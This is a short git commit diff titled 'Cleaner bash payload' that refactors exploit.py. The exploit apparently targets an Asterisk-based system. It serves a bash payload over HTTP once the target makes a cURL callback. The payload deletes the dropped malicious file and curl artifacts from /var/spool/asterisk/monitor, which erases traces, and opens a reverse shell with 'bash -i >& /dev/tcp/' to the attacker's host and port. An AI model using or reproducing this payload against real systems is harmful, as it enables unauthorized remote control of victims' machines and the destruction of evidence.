Cleaner bash payload

2024-09-16 01:34:05 +02:00
parent c95803b264
commit eef25f93bb
1 changed files with 3 additions and 3 deletions
--- a/exploit.py
+++ b/exploit.py
@@ -724,11 +724,11 @@ class Exploit:
                self.custom_print(
                    f"Received cURL request from {incoming_address[0]}", "+"
                )
-                exploit_script = f"#!/bin/bash\n"
-                exploit_script += (
+                exploit_script = (
+                    f"#!/bin/bash\n"
                    f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*curl*\n"
+                    f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
                )
-                exploit_script += f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"

                http_response = f"HTTP/1.1 200 OK\r\n"
                http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n"